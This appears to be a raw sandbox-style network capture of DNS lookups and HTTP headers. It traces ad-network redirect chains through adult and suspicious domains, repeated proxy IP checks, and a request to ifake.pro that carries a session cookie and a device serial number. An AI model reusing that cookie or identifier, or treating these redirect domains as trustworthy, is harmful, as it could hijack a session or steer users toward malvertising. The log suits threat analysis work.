Transfer-Encoding: chunked
Connection: keep-alive
referrer-policy: no-referrer
location: https://wait5sec.com/w43qhBkY?source=25047
set-cookie: pop-u-uni-dd4943=b3a2eb30e36c05313c779a1d977f5294a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22pop-u-uni-dd4943%22%3Bi%3A1%3Bs%3A2%3A%22no%22%3B%7D; expires=Tue, 07-Sep-2021 09:49:01 GMT; Max-Age=86400; path=/; HttpOnly
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pbRbnBmlfvHWAbU%2BxUXPl6ncvtzHMTCNkvKjKRgwwdtvpu2p1D8wqQDabWq%2FGA9Tm%2B6Z1IUrzd4NA%2BaVB8O5BOhO2OBselEWrhwBc2rwGYwcShRPSzIpfO5q1NUNjooPeftVccgb%2FJY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6c8f18dd54178-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A172.67.75.150monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167
-
DNSstatic-assets.dev.fs.liveperson.comRequeststatic-assets.dev.fs.liveperson.comIN AResponsestatic-assets.dev.fs.liveperson.comIN CNAMEdko6se4p8ak2b.cloudfront.netdko6se4p8ak2b.cloudfront.netIN A52.222.139.8dko6se4p8ak2b.cloudfront.netIN A52.222.139.20dko6se4p8ak2b.cloudfront.netIN A52.222.139.74dko6se4p8ak2b.cloudfront.netIN A52.222.139.86
-
DNSaccdn.lpsnmedia.netRequestaccdn.lpsnmedia.netIN AResponseaccdn.lpsnmedia.netIN CNAMEgeo.accdn.livepersonk.akadns.netgeo.accdn.livepersonk.akadns.netIN A178.249.97.99
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:05 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSpixel.adsafeprotected.comRequestpixel.adsafeprotected.comIN AResponsepixel.adsafeprotected.comIN CNAMEvapixel.adsafeprotected.comvapixel.adsafeprotected.comIN CNAMEfirewall-external-1524972847.us-east-1.elb.amazonaws.comfirewall-external-1524972847.us-east-1.elb.amazonaws.comIN A34.192.17.244firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A3.215.54.157firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A3.227.87.232firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A54.147.163.112firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A174.129.162.246firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A50.17.177.69firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A52.55.209.64firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A3.221.196.84
-
DNSui.clevernt.comRequestui.clevernt.comIN AResponseui.clevernt.comIN A148.69.64.109
-
DNStps.doubleverify.comRequesttps.doubleverify.comIN AResponsetps.doubleverify.comIN CNAMEtps-geo.dvgtm.akadns.nettps-geo.dvgtm.akadns.netIN CNAMEtps-wlb-eu.dvgtm.akadns.nettps-wlb-eu.dvgtm.akadns.netIN CNAMEfrcp-hlb.dvgtm.akadns.netfrcp-hlb.dvgtm.akadns.netIN A213.254.244.20
-
DNStwinrdsrv.comRequesttwinrdsrv.comIN AResponsetwinrdsrv.comIN A172.67.69.103twinrdsrv.comIN A104.26.11.159twinrdsrv.comIN A104.26.10.159
-
DNSdev.visualwebsiteoptimizer.comRequestdev.visualwebsiteoptimizer.comIN AResponsedev.visualwebsiteoptimizer.comIN A34.96.102.137
-
DNSm1.firon.xyzRequestm1.firon.xyzIN AResponsem1.firon.xyzIN A173.236.118.100
-
DNSp11.techlab-cdn.comRequestp11.techlab-cdn.comIN AResponsep11.techlab-cdn.comIN CNAMEsecure.chameleonx.com.edgekey.netsecure.chameleonx.com.edgekey.netIN CNAMEe37498.dsca.akamaiedge.nete37498.dsca.akamaiedge.netIN A96.16.53.216e37498.dsca.akamaiedge.netIN A96.16.53.202
-
DNSsee-porn.comRequestsee-porn.comIN AResponsesee-porn.comIN A167.86.103.60
-
GEThttp://see-porn.com/click.phpRequestGET /click.php HTTP/1.1
Host: see-porn.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNStpc.googlesyndication.comRequesttpc.googlesyndication.comIN AResponsetpc.googlesyndication.comIN A142.251.36.1
-
DNSstatic-assets.dev.fs.liveperson.comRequeststatic-assets.dev.fs.liveperson.comIN AResponsestatic-assets.dev.fs.liveperson.comIN CNAMEdko6se4p8ak2b.cloudfront.netdko6se4p8ak2b.cloudfront.netIN A52.222.139.20dko6se4p8ak2b.cloudfront.netIN A52.222.139.74dko6se4p8ak2b.cloudfront.netIN A52.222.139.8dko6se4p8ak2b.cloudfront.netIN A52.222.139.86
-
DNStps20237.doubleverify.comRequesttps20237.doubleverify.comIN AResponsetps20237.doubleverify.comIN CNAMEfrcp-hlb.doubleverify.comfrcp-hlb.doubleverify.comIN CNAMEfrcp-hlb.dvgtm.akadns.netfrcp-hlb.dvgtm.akadns.netIN A213.254.244.19
-
DNSstatic.adsafeprotected.comRequeststatic.adsafeprotected.comIN AResponsestatic.adsafeprotected.comIN CNAMEstati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comstati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A52.49.37.161stati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A52.209.62.127stati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A54.228.255.229stati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A52.209.141.213stati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A52.18.40.16stati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A54.76.195.222stati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A18.203.198.3stati-stati-5vqsw3ctlefo-93594259.eu-west-1.elb.amazonaws.comIN A34.241.251.11
-
DNSaccdn.lpsnmedia.netRequestaccdn.lpsnmedia.netIN AResponseaccdn.lpsnmedia.netIN CNAMEgeo.accdn.livepersonk.akadns.netgeo.accdn.livepersonk.akadns.netIN A178.249.97.99
-
DNSs.optnx.comRequests.optnx.comIN AResponses.optnx.comIN CNAMEtk6if76q.ab1n.nettk6if76q.ab1n.netIN A95.211.229.245tk6if76q.ab1n.netIN A95.211.229.246
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSlangke.funRequestlangke.funIN AResponselangke.funIN A212.107.18.203
-
GEThttp://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGN4Tm54bVpqVTJNRE16WlRZNFpXWXhObUUzTlRGak1XVTJZV0V3WXpZMFlUVTNaUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1wb3JuaHViLGJpZCxhZHYscGhwJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablRPbmRLNlYwcnFyYlhTdWxkSzZaMHJwWFN1bGRNNlYwcnBYVjFhYTFWeTNUYWFjVGNhMGE2YjUwVVMyV3owMDhWejJ1cmwwbXpxNDRzdW9ycWxwejI0bG9tbnRzbHAxbjBxMjJkZFBaVlpTNFFTQTZQcEhwM3M1enBYU3VsZE5LNlYwcnBYU3VsY0gyQS0tfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTMxMjk0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8NDU3MDAwNnw1ODkxOTAxNHwyfDF8MHwwfDU4OHw5Mjc1NzR8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDY1YmM1NjA5MWJiZjFmYzNjYmVhMzMwNzgyNDRmNjI4fDYwYjFhNWZmNzkzNjUwNGFkZjAzMTI4NzA0YzJiNWRkfDF8MHxwb3JuaHViLmJpZHwwfDB8MHwwLjEyfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwxMHwwfDB8MXwwfE9LfGFkZWJmOWYzZDZhMzE0MDkyZGE5NGZmOTM2OWY3ZDJiRequestGET /cimp.php?data=TVRZek1Ea3lNVGN4Tm54bVpqVTJNRE16WlRZNFpXWXhObUUzTlRGak1XVTJZV0V3WXpZMFlUVTNaUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1wb3JuaHViLGJpZCxhZHYscGhwJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablRPbmRLNlYwcnFyYlhTdWxkSzZaMHJwWFN1bGRNNlYwcnBYVjFhYTFWeTNUYWFjVGNhMGE2YjUwVVMyV3owMDhWejJ1cmwwbXpxNDRzdW9ycWxwejI0bG9tbnRzbHAxbjBxMjJkZFBaVlpTNFFTQTZQcEhwM3M1enBYU3VsZE5LNlYwcnBYU3VsY0gyQS0tfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTMxMjk0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8NDU3MDAwNnw1ODkxOTAxNHwyfDF8MHwwfDU4OHw5Mjc1NzR8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDY1YmM1NjA5MWJiZjFmYzNjYmVhMzMwNzgyNDRmNjI4fDYwYjFhNWZmNzkzNjUwNGFkZjAzMTI4NzA0YzJiNWRkfDF8MHxwb3JuaHViLmJpZHwwfDB8MHwwLjEyfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwxMHwwfDB8MXwwfE9LfGFkZWJmOWYzZDZhMzE0MDkyZGE5NGZmOTM2OWY3ZDJi HTTP/1.1
Host: s.optnx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; Touch; WebView/1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A32%3A%226135e417e86b06.45763620277972215%22%3B%7D; expires=Wed, 06 Sep 2023 09:49:11 GMT; path=; domain=.optnx.com;
Content-Encoding: gzip
-
GEThttp://alfad.pro/go/266933/627004RequestGET /go/266933/627004 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:12 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://langke.fun/ads.htmlRequestGET /ads.html HTTP/1.1
Host: langke.fun
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:12 GMT
Content-Length: 57786
Connection: close
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:13 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSdt.adsafeprotected.comRequestdt.adsafeprotected.comIN AResponsedt.adsafeprotected.comIN CNAMEvadt.adsafeprotected.comvadt.adsafeprotected.comIN CNAMEdt-external-217593033.us-east-1.elb.amazonaws.comdt-external-217593033.us-east-1.elb.amazonaws.comIN A18.213.9.189dt-external-217593033.us-east-1.elb.amazonaws.comIN A44.193.47.41dt-external-217593033.us-east-1.elb.amazonaws.comIN A34.233.44.251dt-external-217593033.us-east-1.elb.amazonaws.comIN A52.44.124.140dt-external-217593033.us-east-1.elb.amazonaws.comIN A34.228.202.144dt-external-217593033.us-east-1.elb.amazonaws.comIN A34.235.176.154dt-external-217593033.us-east-1.elb.amazonaws.comIN A34.197.200.98dt-external-217593033.us-east-1.elb.amazonaws.comIN A34.206.10.182
-
DNSlpcdn.lpsnmedia.netRequestlpcdn.lpsnmedia.netIN AResponselpcdn.lpsnmedia.netIN CNAMEgeo.lpcdn.livepersonk.akadns.netgeo.lpcdn.livepersonk.akadns.netIN A178.249.97.98
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:13 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:13 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNStags.tiqcdn.comRequesttags.tiqcdn.comIN AResponsetags.tiqcdn.comIN CNAMEtags.tiqcdn.com.edgekey.nettags.tiqcdn.com.edgekey.netIN CNAMEe8091.a.akamaiedge.nete8091.a.akamaiedge.netIN A104.80.228.241
-
DNSjav8.usRequestjav8.usIN AResponsejav8.usIN A207.180.237.38
-
DNSelevisions.bizRequestelevisions.bizIN AResponseelevisions.bizIN A65.9.73.41elevisions.bizIN A65.9.73.69elevisions.bizIN A65.9.73.56elevisions.bizIN A65.9.73.21
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
GEThttp://jav8.us/adv.phpRequestGET /adv.php HTTP/1.1
Host: jav8.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; managedpc; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSwww.clinique.comRequestwww.clinique.comIN AResponsewww.clinique.comIN CNAMEsan.clinique.com.edgekey.netsan.clinique.com.edgekey.netIN CNAMEe3243.x.akamaiedge.nete3243.x.akamaiedge.netIN A104.73.132.10
-
DNSkrk.kargo.comRequestkrk.kargo.comIN AResponsekrk.kargo.comIN A3.223.147.57krk.kargo.comIN A52.71.50.199krk.kargo.comIN A3.233.169.27krk.kargo.comIN A107.22.61.52krk.kargo.comIN A3.225.49.235krk.kargo.comIN A107.21.0.187krk.kargo.comIN A52.205.123.115krk.kargo.comIN A3.224.202.137
-
DNScdn.ampproject.orgRequestcdn.ampproject.orgIN AResponsecdn.ampproject.orgIN CNAMEcdn-content.ampproject.orgcdn-content.ampproject.orgIN A142.250.179.193
-
DNSxxx3.xnxxxx.ruRequestxxx3.xnxxxx.ruIN AResponsexxx3.xnxxxx.ruIN A2.57.89.186
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSyesde.xyzRequestyesde.xyzIN AResponseyesde.xyzIN A212.107.18.203
-
DNShubtube.ruRequesthubtube.ruIN AResponsehubtube.ruIN A167.86.103.60
-
DNS789ff.ruRequest789ff.ruIN AResponse789ff.ruIN A172.67.176.50789ff.ruIN A104.21.31.100
-
GEThttp://alfad.pro/go/266933/629200RequestGET /go/266933/629200 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:24 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://yesde.xyz/adv.htmlRequestGET /adv.html HTTP/1.1
Host: yesde.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:24 GMT
Content-Length: 57786
Connection: close
-
GEThttp://hubtube.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: hubtube.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://789ff.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: 789ff.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:49:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.3.23
cache-control: public, max-age=180
expires: Mon, 06 Sep 2021 09:52:24 GMT
vary: Accept-Encoding
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=02NZpshaE6NSLrP8yhai3Mtp9%2BVsXdQJY7DQceYkflzaXyg6Axlvs4hpJC8xaPPuSTGkFKIMvH20oB3Cdjm0%2B8FNnVKqmQ4XA8iByiOnDz7AKLtbtIpw%2Fi9vJA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6c980a8ba00c9-AMS
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
DNScapi.connatix.comRequestcapi.connatix.comIN AResponsecapi.connatix.comIN A3.22.107.131capi.connatix.comIN A18.218.217.49capi.connatix.comIN A3.133.60.139capi.connatix.comIN A52.15.107.106capi.connatix.comIN A3.22.136.188capi.connatix.comIN A18.116.127.165capi.connatix.comIN A18.116.58.214capi.connatix.comIN A18.116.99.40
-
DNStranslate.googleapis.comRequesttranslate.googleapis.comIN AResponsetranslate.googleapis.comIN A142.250.179.138
-
DNShblg.media.netRequesthblg.media.netIN AResponsehblg.media.netIN A2.16.118.158
-
DNSsync.rtk.ioRequestsync.rtk.ioIN AResponsesync.rtk.ioIN A147.75.107.42sync.rtk.ioIN A147.75.107.82
-
DNSad.atdmt.comRequestad.atdmt.comIN AResponsead.atdmt.comIN CNAMEgeo.atlassbx.comgeo.atlassbx.comIN CNAMEatlas.c10r.facebook.comatlas.c10r.facebook.comIN A31.13.64.2
-
DNSbit.lyRequestbit.lyIN AResponsebit.lyIN A67.199.248.10bit.lyIN A67.199.248.11
-
DNSjpav.usRequestjpav.usIN AResponsejpav.usIN A167.86.121.34
-
GEThttp://jpav.us/index.htmlRequestGET /index.html HTTP/1.1
Host: jpav.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9895 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:25 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Thu, 26 Aug 2021 08:30:28 GMT
Connection: keep-alive
ETag: "61275124-108"
Accept-Ranges: bytes
-
DNSwww.apple.comRequestwww.apple.comIN AResponsewww.apple.comIN CNAMEwww.apple.com.edgekey.netwww.apple.com.edgekey.netIN CNAMEwww.apple.com.edgekey.net.globalredir.akadns.netwww.apple.com.edgekey.net.globalredir.akadns.netIN CNAMEe6858.dscx.akamaiedge.nete6858.dscx.akamaiedge.netIN A23.222.19.65
-
DNSwww.bing.comRequestwww.bing.comIN AResponsewww.bing.comIN CNAMEa-0001.a-afdentry.net.trafficmanager.neta-0001.a-afdentry.net.trafficmanager.netIN CNAMEwww-bing-com.dual-a-0001.a-msedge.netwww-bing-com.dual-a-0001.a-msedge.netIN CNAMEdual-a-0001.dc-msedge.netdual-a-0001.dc-msedge.netIN A131.253.33.200dual-a-0001.dc-msedge.netIN A13.107.22.200
-
DNSifake.proRequestifake.proIN AResponseifake.proIN A45.76.155.77
-
GEThttp://ifake.pro/ip?serial_number=DX3RCQSYFFDNRequestGET /ip?serial_number=DX3RCQSYFFDN HTTP/1.1
Host: ifake.pro
Accept: */*
Pragma: no-cache
Connection: keep-alive
Cookie: connect.sid=s%3A_srCe3PHFJKFrzYpG8CVKI1R-gcTtlnJ.sFCAaYPFVn1uB8dlZolPKxepiHDQI9DQIn9FBNWgkcA
User-Agent: iFakeProTools/5.9.6 CFNetwork/978.0.7 Darwin/18.7.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
X-Powered-By: iThanh
Vary: Origin, Accept-Encoding
Access-Control-Allow-Credentials: true
Strict-Transport-Security: max-age=5184000; includeSubDomains
Content-Type: text/html; charset=utf-8
Content-Length: 12
ETag: W/"c-T+jtdWoufQlJnZYss//Zp9PiBJU"
Date: Mon, 06 Sep 2021 09:49:26 GMT
Connection: keep-alive
-
DNS686eb51b.akstat.ioRequest686eb51b.akstat.ioIN AResponse686eb51b.akstat.ioIN CNAMEwildcard46.akstat.io.edgekey.netwildcard46.akstat.io.edgekey.netIN CNAMEe4518.dscx.akamaiedge.nete4518.dscx.akamaiedge.netIN A104.80.224.132
-
DNSwww.locked1.comRequestwww.locked1.comIN AResponsewww.locked1.comIN CNAMElocked1.comlocked1.comIN A3.225.87.211
-
DNSmaodes.comRequestmaodes.comIN AResponsemaodes.comIN A5.181.218.143
-
DNSstatic.criteo.netRequeststatic.criteo.netIN AResponsestatic.criteo.netIN CNAMEstatic.par.vip.prod.criteo.netstatic.par.vip.prod.criteo.netIN A178.250.0.130
-
DNScdn.ampproject.orgRequestcdn.ampproject.orgIN AResponsecdn.ampproject.orgIN CNAMEcdn-content.ampproject.orgcdn-content.ampproject.orgIN A142.250.179.193
-
DNScsm.nl.eu.criteo.netRequestcsm.nl.eu.criteo.netIN AResponsecsm.nl.eu.criteo.netIN CNAMEcsm.am5.vip.prod.criteo.netcsm.am5.vip.prod.criteo.netIN A178.250.2.150
-
DNSgoogleads.g.doubleclick.netRequestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A142.250.179.194
-
DNSwww.apple.comRequestwww.apple.comIN AResponsewww.apple.comIN CNAMEwww.apple.com.edgekey.netwww.apple.com.edgekey.netIN CNAMEwww.apple.com.edgekey.net.globalredir.akadns.netwww.apple.com.edgekey.net.globalredir.akadns.netIN CNAMEe6858.dscx.akamaiedge.nete6858.dscx.akamaiedge.netIN A23.222.19.65
-
DNSwww.bing.comRequestwww.bing.comIN AResponsewww.bing.comIN CNAMEa-0001.a-afdentry.net.trafficmanager.neta-0001.a-afdentry.net.trafficmanager.netIN CNAMEwww-bing-com.dual-a-0001.a-msedge.netwww-bing-com.dual-a-0001.a-msedge.netIN CNAMEdual-a-0001.dc-msedge.netdual-a-0001.dc-msedge.netIN A131.253.33.200dual-a-0001.dc-msedge.netIN A13.107.22.200
-
